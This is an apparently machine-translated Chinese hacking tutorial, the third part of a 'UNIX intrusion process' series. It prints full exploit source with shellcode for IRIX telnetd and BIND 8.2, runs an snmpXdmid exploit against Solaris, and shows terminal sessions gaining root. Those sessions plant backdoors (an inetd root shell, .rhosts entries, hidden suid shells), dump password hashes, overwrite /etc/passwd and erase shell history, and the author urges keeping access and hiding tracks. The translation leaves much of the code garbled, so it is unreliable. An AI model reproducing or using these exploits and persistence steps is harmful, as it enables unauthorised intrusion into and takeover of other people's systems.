UNIX intrusion process (3)

xiaoxiao2021-03-06  88

# Gcc -o snmp snmp.c SNMP.c: in function `main ': SNMP.c: 135: Warning: Assignment Makes Pointer from Integer WITHOUT A CAST SNMP.C: 172: Warning: Passing Arg 4 of Pointer To Function from O incompatible pointer type Undefined first referenced symbol in file xdr_void /var/tmp/cca3rEDd.o clnttcp_create /var/tmp/cca3rEDd.o gethostbyname /var/tmp/cca3rEDd.o xdr_bool /var/tmp/cca3rEDd.o xdr_u_long / var / tmp /cca3rEDd.o authsys_create /var/tmp/cca3rEDd.o inet_addr /var/tmp/cca3rEDd.o clnt_pcreateerror /var/tmp/cca3rEDd.o xdr_array /var/tmp/cca3rEDd.o getsockname /var/tmp/cca3rEDd.o xdr_char /var/tmp/cca3redd.o xdr_point /var/tmp/cca3redd.o ld: Fatal: Symbol Refer Erming errors. No output Written to SNMP (*** Compilation ***) Collect2: ld returned 1 exit status # gcc -o snmp snmp.c -lnsl snmp.c: in function `main ': snmp.c: 135 : warning: assignment makes pointer from integer without a cast snmp.c: 172: warning: passing arg 4 of pointer to function from incompatible pointer type Undefined first referenced symbol in file getsockname /var/tmp/ccBaS71K.o ld: fatal: Symbol Referencing Errors. No Output Written To SNMP Collect: LD Returned 1 EXIT STATUS # gcc -o snmp snmp.c -lnsl -lsocket (*** To compile with NSL and Socket) SNMP.c: in function `main '

: Snmp.c: 135: warning: assignment makes pointer from integer without a cast snmp.c: 172: warning: passing arg 4 of pointer to function from incompatible pointer type # ./snmp copyright LAST STAGE OF DELIRIUM mar 2001 poland // LSD-PL.NET/ SNMPXDMID for Solaris 2.7 2.8 Sparc usage: ./snmp address [-p port] -v 7 | 8 #. / SNMP 192.168.0.4 -v 8 (*** 192.168.0.4 is Taunch SUNOS 5.8 SPARC machines ***) copyright LAST STAGE oF DELIRIUM mar 2001 poland //lsd-pl.net/ snmpXdmid for solaris 2.7 2.8 sparc adr = 0x000c8f68 timeout = 30 port = 928 connected! sent! SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW ULTRA-250 ID UID = 0 (root) GID = 0 (root) Echo " "> /. Rhosts Echo 'IngreSlock Stream TCP NOWAIT ROOT / BIN / KSH KSH -I'> /TMP/.x / usr / Sbin / inetd -s /tmp/.x rm -f /tmp/.x telnet localhost 1524 TELNET 127.0.1 ... Connected to localhost. Escape character is '^]'. # id ksh: id ^ m: not Found # Id; uid = 0 (root) GID = 0 (root) KSH: ^ m: not found # exit; connection closed by Foreign Host. EXIT. EXIT (*** casually load a back door to walk people ***) # ----------------------------------- -------------- TEST ----------------------------------- --------------------------- Sunos 5.6 5.7 5.8 machines, find other systems. What system is the most broken? Win2000? Oh, I am talking about the UNIX series.

Tell everyone, IRIX is the most broken ~ Hoho ~ I remember that I swept it to an Irix machine, we went to kill it ~ ---------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- # telnet 192.168.0.10 Trying 192.168.0.10. .. Connected to 192.168.0.10. Escape character is '^]'. Irix (O2) login: Test Password: ux: login: error: Login incorrect login: ^] telnet> quit connection closed. #Cat> telnetd.c ( *** Source program at http://lsd-pl.net/files/get?irix/irx_telnetd ***) # include # include

#include

#include

#include

#include

#include

#include

Char shellcode [] =

"/ X04 / X10 / XFF / XFF" / * Bltzal $ ZERO,

* /

"/ x24 / x02 / x03 / xf3" / * li $ v0,1011 * /

"/ X23 / XFF / X02 / X14" / * Addi $ RA, $ RA, 532 * /

"/ x23 / xe4 / xfe / x08" / * Addi $ A0, $ RA, -504 * /

"/ X23 / XE5 / XFE / X10" / * Addi $ A1, $ RA, -496 * /

"/ XAF / XE4 / XFE / X10" / * SW $ A0, -496 ($ ra) * /

"/ XAF / XE0 / XFE / X14" / * SW $ ZERO, -492 ($ ra) * /

"/ Xa3 / XE0 / XFE / X0F" / * SB $ ZERO, -497 ($ ra) * /

"/ X03 / XFF / XFF / XCC" / * syscall * /

"/ bin / sh"

;

TYPEDEF STRUCT {char * VERS;} tabent1_t;

Typedef struct {int FLG, LEN; INT GOT, G_OFS, SUBBUFFER, S_OFS;} tabent2_t;

Tabent1_t tab1 [] = {

{"Irix 6.2 Libc.so.1: no patches telnetd: no patches"},

{"Irix 6.2 Libc.so.1: 1918 | 2086 Telnetd: no patches"}

{"Irix 6.2 Libc.so.1: 3490 | 3723 | 3771 Telnetd: no patches"},

{"Irix 6.2 Libc.so.1: no patches telnetd: 1485 | 2070 | 3117 | 3414"},

{"IRIX 6.2 Libc.so.1: 1918 | 2086 Telnetd: 1485 | 2070 | 3117 | 3414"}, {"Irix 6.2 Libc.so.1: 3490 | 3723 | 3771 Telnetd: 1485 | 2070 | 3117 | 3414 }

{"Irix 6.3 Libc.so.1: no patches telnetd: {" irix 6.3 libc.so.1: 2087 telnetd: no patches "},

{"Irix 6.3 Libc.so.1: 3535 | 3737 | 3770 Telnetd: no patches"},

{"Irix 6.4 Libc.so.1: no patches telnetd: no patches"},

{"Irix 6.4 Libc.so.1: 3491 | 3769 | 3738 Telnetd: no patches"},

{"IRIX 6.5-6.5.8M 6.5-6.5.7F Telnetd: no patches"},

{"Irix 6.5.8F Telnetd: no patches"}

}

Tabent2_t tab2 [] = {

{0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14},

{0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14},

{0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14},

{0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14},

{0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14},

{0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14},

{0, 0x56, 0x0fb4fcE0, 104, 0x7fc4d230, 0x14},

{0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14},

{0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14},

{1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c},

{1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c},

{1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c},

{1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c}

}

Char Env_Value [1024];

INT prepare_env (int version) {

INT I, ADR, PCH, ADRH, ADRL

Char * b;

PCH = Tab2 [VERS] .got (Tab2 [VERS] .G_OFS * 4);

ADR = Tab2 [VERS] .SUBBUFFER TAB2 [VERS] .s_ofs;

ADRH = (ADR >> 16) - Tab2 [VERS] .LEN;

ADRL = 0x10000- (ADRH & 0xFFFF) (ADR & 0xFFFF) -tab2 [VERS] .le;

B = ENV_ IF (! Tab2 [VERS] .flg) {

For (i = 0; i <1; i ) * b = '; for (i = 0; i <4; i ) * b = (char) ((PCH >> ((3-I% 4) * 8)) & 0xff);

For (i = 0; i <4; i ) * b = (char) ((PCH 2 >> ((3-I% 4) * 8) & 0xFF);

For (i = 0; i <3; i ) * b = '';

For (i = 0; i

* B = shellcode [i];

IF ((* (b-1) == (char) 0x02) || (* (b-1) == (char) 0xFF)) * b = shellcode [i];

}

Sprintf (B, "%%% 05DC %% 22 $ hn %%% 05DC %% 23 $ hn", Adrh, Adrl)

} else {

For (i = 0; i <5; i ) * b = '';

For (i = 0; i <4; i ) * b = (char) ((((((((((3-I% 4) * 8) & 0xFF);

For (i = 0; i <4; i ) * b = '';

For (i = 0; i <4; i ) * b = (char) ((PCH 2 >> ((3-I% 4) * 8) & 0xFF);

For (i = 0; i <3; i ) * b = '';

For (i = 0; i

* B = shellcode [i];

IF ((* (b-1) == (char) 0x02) || (* (b-1) == (char) 0xFF)) * b = shellcode [i];

}

Sprintf (B, "%%% 05DC %% 11 $ hn %%% 05dc %% 12 $ hn", Adrh, Adrl)

}

B = Strlen (b);

Return (b-env_value);

}

Main (int Argc, char ** argv) {

Char buffer [8192];

INT I, C, SCK, IL, IH, CNT, VERS = 65;

Struct hostent * hp;

Struct SockAddr_in ADR;

Printf ("Copyright Last Stage Of Delirium Jul 2000 Poland //LSD-PL.NET//N");

Printf ("Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL / N / N");

IF (argc <2) {

Printf ("USAGE:% s address [-v 62 | 63 | 64 | 65] / n", Argv [0]);

EXIT (-1);

}

While ((c = getopt (argc-1, & argv [1], "sc: p: p:")))! = - 1) {

Switch (c) {

Case 'V': VERS = ATOI (OPTARG);

}

}

Switch (VERS) {

Case 62: IL = 0; IH = 5; BREAK;

Case 63: IL = 6; IH = 8; Break; Case 64: IL = 9; IH = 10; Break;

Case 65: IL = 11; IH = 12; Break;

DEFAULT: EXIT (-1);

}

For (i = IL; i <= IH; i ) {

Printf ("."); FFLUSH (stdout);

SCK = Socket (AF_INET, SOCK_STREAM, 0);

ADR.SIN_FAMILY = AF_INET;

ADR.SIN_PORT = HTONS (23);

IF ((adr.sin_addr.s_addr = inet_addr (argv [1])) == - 1) {

IF ((hp = gethostByname) == null) {

Errno = EADDRNOTAVAIL; PERROR ("error"); exit (-1);

}

Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);

}

IF (Connect (STRUCT SOCKADDR *) & ADR, SIZEOF (Struct SockAddr_in)) <0) {

PERROR ("error"); exit (-1);

}

CNT = prepare_env (i);

Memcpy (buffer, "/ x01 / x58 / x58 / x58 / x58 / x00", 10)

Sprintf (& Buffer [10], "% S / XFF / XF0", Env_Value);

Write (SCK, BUFFER, 10 CNT 2);

Sleep (1);

Memcpy (Buffer, "/ X01 / X5F / X24 / X00 / X01 / X00% S / XFF / XF0", 10)

Sprintf (& Buffer [10], "% S / XFF / XF0", Env_Value);

Write (SCK, BUFFER, 10 CNT 2);

IF (((CNT = Read (SCK, Buffer, SIZEOF (Buffer)) <2) || (Buffer [0]! = (char) 0xFF) {

Printf ("Warning: Telnetd Seems To BE Used with TCP Wrapper / N);

}

Write (SCK, "/ bin / uname -a / n", 14);

IF ((CNT = Read (SCK, Buffer, SIZEOF (Buffer))> 0) {

Printf ("/ n% s / n / n", tab1 [i] .vers);

Write (1, Buffer, CNT);

Break;

}

Close (SCK);

}

IF (i> IH) {Printf ("/ Nerror: not vulnerable / n"); exit (-1);}

While (1) {

FD_SET FDS;

FD_ZERO (& FDS);

FD_SET (0, & fds);

FD_SET (SCK, & FDS);

IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {

int CNT;

Char BUF [1024];

IF (fd_isset (0, & fds)) {

IF ((CNT = Read (0, BUF, 1024)) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

Write (SCK, BUF, CNT);

}

IF (fd_isset (SCK, & FDS)) {

IF ((CNT = Read (SCK, BUF, 1024) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

}

Write (1, BUF, CNT);

}

}

}

}

^ D

# Gcc -o telnetd telnetd.c

Telnetd.c: 33: Parse Error Before `Irix '

Telnetd.c: 37: Malformed floating constant

Telnetd.c: 37: Nondigits in Number and Not Hexadecimal

Telnetd.c: 37: Malformed floating constant

Telnetd.c: 38: Malformed floating constant

Telnetd.c: 77: Nondigits in Number and Not Hexadecimal

... (*** Because the paste text is wrong, a lot of error messages ***)

# Vi telnetd.c (*** Hello to edit the program ***)

"telnetd.c" [new file]

#include

#include

#include

...

(*** Re-paste again ***)

...

"telnetd.c" [new file] 188 LINES, 6738 Characters

# Gcc -o telnetd telnetd.c

Undefined first referened

Symbol in file

Socket /var/tmp/ccuoeaph.o

GethostByname /var/tmp/ccuoeaph.o

INET_ADDR /VAR/TMP/CCUOEAPH.O

Connect /var/tmp/ccuoeaph.o

LD: Fatal: Symbol Referencing Errors. No Output Written To Telnetd

Collect2: ld returned 1 exit status

# Gcc -o telnetd telnetd.c -lsocket -lnsl

# ./Telnetd

Copyright last stage of delirium jul 2000 poland //lsd-pl.net/

Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL

USAGE: ./telnetd address [-v 62 | 63 | 64 | 65]

# ./Telnetd 192.168.0.10 -v 65

Copyright last stage of delirium jul 2000 poland //lsd-pl.net/

Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL

.

Irix 6.5-6.5.8M 6.5-6.5.7F Telnetd: no patches

Irix O2 6.5 05190004 IP32 (*** overflow success ***)

id

UID = 0 (root) GID = 0 (SYS)

CAT / etc / passwdroot: mmani4kyarae: 0: 0: super-user: /: / usr / bin / tcsh

sysadm: *: 0: 0: System V Administration: / usr / admin: / bin / sh

CMWLogin: *: 0: 994: CMW login Userid: / usr / cmw: / sbin / csh

Diag: *: 0: 996: Hardware Diagnostics: / usr / diags: / bin / csh

Daemon: *: 1: 1: daem: /: / dev / null

BIN: *: 2: 2: System Tools Owner: / bin: / dev / null

UUCP: *: 3: 5: UUCP OWNER: / USR / LIB / UUCP: / BIN / CSH

Sys: *: 4: 0: System Activity Owner: / VAR / ADM: / BIN / SH

ADM: *: 5: 3: Accounting Files Owner: / VAR / ADM: / BIN / SH

LP :: 9: 9: Print Spooler Owner: / var / spool / lp: / bin / sh *** Many people come in?

Nuucp :: 10: 10: Remote uucp user: / var / spool / uucppublic: / usr / lib / uucp / uuCico *

Auditor: *: 11: 0: Audit Activity Owner: / Auditor: / bin / sh

DBADMIN: *: 12: 0: Security Database Owner: / dbadmin: / bin / sh

SGIWeb: *: 13: 60001: SGI Web Applications: / VAR / WWW / HTDOCS: / BIN / CSH

Rfindd: *: 66: 1: RFIND Daemon and fsdump: / var / rfindd: / bin / sh

EZSETUP :: 992: 998: System setup: / var / sysadmdesktop / ezsetup: / bin / csh *

Demos :: 993: 997: Demonstration User: / usr / demos: / bin / csh *

Outofbox :: 995: 997: Out of Box Experience: / usr / people / outofbox: / bin / csh *

Guest :: 998: 998: Guest Accent: / usr / people / guest: / bin / csh *

4DGIFTS: *: 999: 998: 4DGifts Account: / usr / people / 4dgifts: / bin / csh

NoBody: *: 60001: 60001: SVR4 Nobody Uid: / dev / null: / dev / null

Noaccess: *: 60002: 60002: Uid no access: / dev / null: / dev / null

NoBody: *: 60001: 60001: Original Nobody Uid: / dev / null: / dev / null

Informix: *: 49999: 777: Informix SA 3.0: / USR / SGI / Informix: / Bin / CSH

POSUser: GYO7HUQ9BFNYE: 55555: 20 :::

Antoni: Zuzbvpoz6HC4G: 23117: 20: Antoniwang: / usr / people / antoni: / bin / csh

#mkdir / usr / lib / ... (*** There are so many users can log in, we can be a Suid root shell. ***)

Cp / bin / ksh /usr/lib/.../.x

CHMOD S /USR/LIB/... /

exit

#

------------------------------------------------ Test -------------------------------------------------- ------------ Attack IRIX 6.5 under the SunOS 5.7 platform successfully completed. :)

Let's find a few Linux playing. Looking for redhat, there are more vulnerabilities, such as rpc.statd wuftp bind lpd, etc. : P

We also use this SunOS 5.7 as our attacked Linux platform. LSD writes EXPLOIT universality is really good.

This time we use bind to overflow to attack RedHat 6.2

However, because of the Worm, Bind's success rate of Worm, Bind is already small.

You can try other distance overflow ~~

------------------------------------------------ Test -------------------------------------------------- ----------------

#cat> bind.c (*** source program at http://lsd-pl.net/files/get?linux/linx86_bind ***)

#include

#include

#include

#include

#include

#include

#include

Char msg [] = {

0xAb, 0xcd, 0x09,0x80,0x00,0x00,0x00,0x01,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,

0x01, 0x20,0x20,0x20,0x20,0x02,0x61

}

Char asmcode [] =

"/ x3f" / * label Len 63 * /

"/ x90 / x90 / x90" / * padding * /

"/ Xeb / x3b" / * JMP

* /

"/ x31 / xdb" / * xorl% EBX,% EBX * /

"/ x5f" / * POPL% EDI * /

"/ x83 / XEF / X7C" / * SUB $ 0x7c,% EDI * /

"/ x8d / x77 / x10" / * LEAL 0X10 (% EDI),% ESI * /

"/ x89 / x77 / x04" / * movl% ESI, 0x4 (% EDI) * /

"/ x8d / x4f / x20" / * LEAL 0X20 (% EDI),% ECX * /

"/ x89 / x4f / x08" / * MOVL% ECX, 0x8 (% EDI) * /

"/ XB3 / X10" / * MOVB $ 0X10,% BL * /

"/ x89 / x19" / * MOVL% EBX, (% ECX) * /

"/ x31 / xc9" / * xorl% ECX,% ECX * /

"/ XB1 / XFF" / * MOVB $ 0xFF,% cl * / "/ x89 / x0f" / * movl% ECX, (% EDI) * /

"/ x51" / * pushl% ECX * /

"/ x31 / xc0" / * xorl% EAX,% EAX * /

"/ XB0 / X66" / * MOVB $ 0x66,% Al * /

"/ XB3 / X07" / * MOVB $ 0X7,% BL * /

"/ x89 / xf9" / * MOVL% EDI,% ECX * /

"/ xcd / x80" / * int $ 0x80 * /

"/ x59" / * POPL% ECX * /

"/ x31 / xdb" / * xorl% EBX,% EBX * /

"/ x39 / xd8" / * CMPL% EBX,% EAX * /

"/ x75 / x0a" / * jne

* /

"/ x66 / xbb / x12 / x34" / * MOVW $ 0x1234,% bx * /

"/ x66 / x39 / x5e / x02" / * cmpw% BX, 0x2 (% ESI) * /

"/ x74 / x08" / * JE

* /

"/ xe2 / xe0" / * loop

* /

"/ x3f" / * label Len 63 * /

"/ XE8 / XC0 / XFF / XFF / XFF" / * CALL

* /

"/ x89 / xcb" / * movl% ECX,% EBX * /

"/ x31 / xc9" / * xorl% ECX,% ECX * /

"/ XB1 / X03" / * MOVB $ 0x03,% CL * /

"/ x31 / xc0" / * xorl% EAX,% EAX * /

"/ XB0 / X3F" / * MOVB $ 0x3f,% Al * /

"/ x49" / * DECL% ECX * /

"/ xcd / x80" / * int $ 0x80 * /

"/ x41" / * incl% ECX "/ xe2 / xf6" / * loop

* /

"/ Xeb / X14" / * JMP * /

"/ x31 / xc0" / * xorl% EAX,% EAX * /

"/ x5b" / * popl% EBX * /

"/ x8d / x4b / x14" / * Leal 0x14 (% EBX),% ECX * /

"/ x89 / x19" / * MOVL% EBX, (% ECX) * /

"/ x89 / x43 / x18" / * movl% EAX, 0x18 (% EBX) * /

"/ x88 / x43 / x07" / * MOVB% Al, 0x7 (% EBX) * /

"/ x31 / xd2" / * xorl% EDX,% EDX * /

"/ XB0 / X0B" / * MOVB $ 0XB,% Al * /

"/ xcd / x80" / * int $ 0x80 * /

"/ XE8 / XE7 / XFF / XFF / XFF" / * CALL

* /

"/ bin / sh"

"/ x90 / x90 / x90 / x90" / * padding * /

"/ x90 / x90 / x90 / x90"

;

Int Rev (int a) {

INT i = 1;

IF ((* (char *) & i)) RETURN (A);

RETURN ((A >> 24) & 0xFF) | (((A >> 16) & 0xFF) << 8) | (((A >> 8) & 0xFF) << 16) | ((A & 0xFF) << 24);

}

INT main (int Argc, char ** argv) {

Char buffer [1024], * b;

INT I, C, N, SCK [2], FP, PTR6, JMP, CNT, OFS, FLAG = -1;

Struct hostent * hp;

Struct SockAddr_in ADR;

Printf ("Copyright Last Stage of Delirium Feb 2001 Poland //LSD-PL.NET//N");

Printf ("Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / RedHat 6.2 x86 / N / N");

IF (argc <2) {

Printf ("USAGE:% s address [-s] [- e] / n", argv [0]);

Printf ("-s send infoleak packet / n");

Printf ("-e send expel packet / n");

EXIT (-1);

}

While (c = getopt (argc-1, & argv [1], "se"))! = - 1) {

Switch (c) {

Case 's': Flag = 1; Break;

Case 'E': Flag = 2;

}

}

IF (Flag == - 1) exit (-1);

ADR.SIN_FAMILY = AF_INET;

ADR.SIN_PORT = HTONS (53); IF ((ADR.SIN_ADDR.S_ADDR = INET_ADDR (Argv [1])) == - 1) {

IF ((hp = gethostByname) == null) {

Errno = EADDRNOTAVAIL; goto err;

}

Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);

}

SCK [0] = Socket (AF_INET, SOCK_DGRAM, 0);

SCK [1] = Socket (AF_INET, SOCK_STREAM, 0);

IF (Connect (SCK [0], (Struct SockAddr *) & ADR, SIZEOF (ADR)) <0) goto err;

IF (Connect (SCK [1], (Struct Sockaddr *) & ADR, SIZEOF (ADR)) <0) Goto Err;

i = sizeof (struct sockaddr_in);

IF (GetSockName (STRUCT SOCKADDR *) & ADR, & I) == - 1) {

Struct NetBuf {UNSIGNED INT MAXLEN; CHAR * BUF;

Struct NetBuf NB;

IOCTL (SCK [1] (('s' << 8) | 2), "sockmod");

Nb.maxlen = 0xfffff;

nb.len = sizeof (struct sockaddr_in) ;;

Nb.buf = (char *) & ADR;

IOCTL (SCK [1] ((('T' << 8) | 144), & nb);

}

n = ntoHS (adr.sin_port);

ASMCODE [4 48 2] = (unsigned char) ((n >> 8) & 0xFF);

ASMCODE [4 48 3] = (unsigned char) (N & 0xFF);

IF (Write (SCK [0], MSG, SIZEOF (MSG)) == - 1) goto err;

IF ((CNT = Read (SCK [0], Buffer, SIZEOF (Buffer)) == - 1) goto ERR;

Printf ("stack dump: / n");

For (i = 0; i <(CNT-512); i ) {

Printf ("% s% 02x", (i && (! (i% 16)))? "/ n": "", (unsigned char) buffer [512 i]);

}

Printf ("/ n / n");

FP = REV (* (unsigned int *) & buffer [532]);

OFS = (0xfe) - ((FP- (FP & 0xFFFFFFFF00) & 0xFF);

CNT = 163;

IF ((Buffer [512 20 2]! = (char) 0xFF) && (Buffer [512 20 3]! = (char) 0xBF)) {

Printf ("System Does NOT Seem to Be a Vulnerable Linux / N"); exit (1);

}

IF (Flag == 1) {

Printf ("System Seems to Be Running Bind 8.2.x On A Linux / N"); EXIT (-1);}

IF (CNT <(OFS 28)) {

Printf ("Frame Ptr Is Too Low To Be SuccessFully ExploITED / N"); exit (-1);

}

JMP = REV (FP-586);

PTR6 = REV ((fp & 0xfffffff00) -12);

FP = REV (FP & 0xFfffffff00);

Printf ("FRAME PTR = 0x% 08X ADR =% 08X OFS =% D", REV (FP), REV (JMP), OFS)

Printf ("Port =% 04x Connected!", (unsigned short); fflush (stdout);

B = buffer;

Memcpy (B, "/ XAb / XCD / X00 / X00 / X00 / X00 / X00 / X01", 12); B = 12;

For (i = 0; i

For (i = 0; i <(128 >> ​​1); i , b ) * b = 0x01;

Memcpy (B, "/ X00 / X00 / X01 / X00 / X01", 5); B = 5;

For (i = 0; i <(((OFS 64) >> 1); i , b ) * b = 0x01;

* B = 28;

Memcpy (B, "/ X06 / X00 / X00 / X00", 4); B = 4;

Memcpy (B, & FP, 4); B = 4;

Memcpy (B, "/ X06 / X00 / X00 / X00", 4); B = 4;

Memcpy (B, & JMP, 4); B = 4;

Memcpy (B, & JMP, 4); B = 4;

Memcpy (B, & FP, 4); B = 4;

Memcpy (B, & PTR6, 4); B = 4;

CNT- = OFS 28;

For (i = 0; i <(cnt >> 1); i , b ) * b = 0x01;

Memcpy (B, "/ X00 / X00 / X00 / X00 / X01 / X00 / X00 / XFA / XFF", 9); B = 9;

IF (WRITE (SCK [0], Buffer, B- Buffer == - 1) goto err;

Sleep (1); Printf ("Sent! / N");

Write (SCK [1], "/ bin / uname -a / n", 14);

While (1) {

FD_SET FDS;

FD_ZERO (& FDS);

FD_SET (0, & fds);

FD_SET (SCK [1], & fds);

IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {

int CNT;

Char BUF [1024];

IF (fd_isset (0, & fds)) {

IF ((CNT = Read (0, BUF, 1024)) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

}

Write (SCK [1], BUF, CNT);

IF (fd_isset (SCK [1], & fds)) {

IF ((CNT = Read (SCK [1], BUF, 1024) <1) {

IF (errno == ewouldblock || errno == eagain) Continue;

Else Break;

}

Write (1, BUF, CNT);

}

}

}

exit (0);

Err:

PERROR ("error"); exit (-1);

}

^ D

# Gcc -o bind bind.c -lnsl -lsocket

# ./Bind

Copyright last stage of delirium feb 2001 poland //lsd-pl.net/

Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / Redhat 6.2 x86

Usage: ./bind address [-s] [- e]

-S send infinder packet

-e send Exploit Packet

#. / bind 192.168.0.20 -e

Copyright last stage of delirium feb 2001 poland //lsd-pl.net/

Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / Redhat 6.2 x86

Stack dump:

42 24 08 08 02 00 B1 ED CA 42 C8 06 95 D0 15 C0

00 CB FA C0 A8 FC FF BF D6 58 08 08 90 3F 0D 08

F4 A4 10 40 16 00 00 01 00 00 00 90 3F 0D 08

05 00 00 00 E7 0B 08 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

A0 E0 05 08 F4 A4 10 40 C4 FC FF BF 60 E9 0C 08

00 00 00 C8 FD FD BF C8 FD FD FD FD BF 61 D6 05 08

90 3F 0D 08 BC 76 10 40 B4 11 10 40 14 Fe FF BF

01 00 00 00 BC 76 10 40

Frame PTR = 0xBffffc00 ADR = Bffffa5e OFS = 86 Port = E1FA Connected! Sent!

Linux localhost.localdomain 2.2.14-5.0 # 1 tue aug 22 16:49:06 Edt 2000 i686 unknown

Id

UID = 0 (root) GID = 0 (root)

CAT / etc / passwd

Root: x: 0: 0: root: / root: / bin / bash

BIN: X: 1: 1: bin: / bin:

Daemon: x: 2: 2: daem: / sbin:

ADM: X: 3: 4: ADM: / VAR / ADM:

LP: x: 4: 7: lp: / var / spool / lpd:

Sync: x: 5: 0: sync: / sbin: / bin / sync

Shutdown: x: 6: 0: shutdown: / sbin: / sbin / shutdown

Halt: x: 7: 0: Halt: / sbin: / sbin / halt

Mail: x: 8: 12: Mail: / var / spool / mail:

News: x: 9: 13: News: / var / spool / news:

UUCP: X: 10: 14: UUCP: / VAR / SPOOL / UUCP:

Operator: x: 11: 0: Operator: / root:

Games: x: 12: 100: Games: / usr / games:

Gopher: x: 13: 30: Gopher: / usr / lib / gopher-data:

FTP: X: 14: 50: FTP User: / Home / FTP:

Nobody: x: 99: 99: NoDy: /:

XFS: x: 43: 43: x font server: / etc / x11 / fs: / bin / false

GDM: X: 42: 42 :: / Home / GDM: / BIN / BASH

William: x: 500: 500: William Wang: / Home / William: / Bin / Bash

Www: x: 688: 501: Web User: / Home / WWW: / bin / bash

Xeye: x: 689: 501: Xeye Web User: / Home / Xeye: / Bin / Bash

TD_FTP: X: 655: 50: TD Bank FTP Client: / Home / TD_Bank: / BIN / BASH

Cyberplex: x: 690: 100: Cyber: / home / cyberplex: / bin / bash

Echo "Test: 1: 0 :: /: / bin / bash"> / etc / passwd

Telnet Localhost

Trying 127.0.0.1 ...

Connected to 127.0.0.1.

Escape Character is '^]'.

Red Hat Linux Release 6.2 (Zoot)

KERNEL 2.2.14-5.0 on AN i686

Login: Test

Bash $ ID

UID = 1 (bin) GID = 0 (root) groups = 0 (root)

Bash $ exit

Logout

Connection Closed by Foreign Host.

MKDIR / USR / LIB / ...

Cp / bin / sh/usr/lib/... /

CHMOD S /USR/LIB/... /

exit

#RM -RF /TMP /*.C

#mv bind / usr / lib / ...

#mv Test / USR / LIB / ...

#mv lpset / usr / lib / ...

#mv SNMP / USR / LIB / ...

#CD

#rm -rf .sh_history /.sh_history

#CHMOD 777 / USR / LIB / ...

#exit

$ EXIT

------------------------------------------------ Test -------------------------------------------------- ----------------

There are many, such as erasing of the back door installation and footprints.

In fact, it is more important to invade a system to keep your permissions on the system, so clear the log to avoid being discovered, and place the back door to enter this system again.

It is very important.

Because the tutorial I have written before, I will not write.

Everyone will slowly improve their own technology.

There is time to spread the results, such as RedHat 7.0 and the dead freebsd.

I want to think about it.

The meat chicken is coming back there, and the last invading course is finally written, goodbye ~

I will write some technical analysis articles.

Good luck ...

转载请注明原文地址:https://www.9cbs.com/read-122284.html

New Post(0)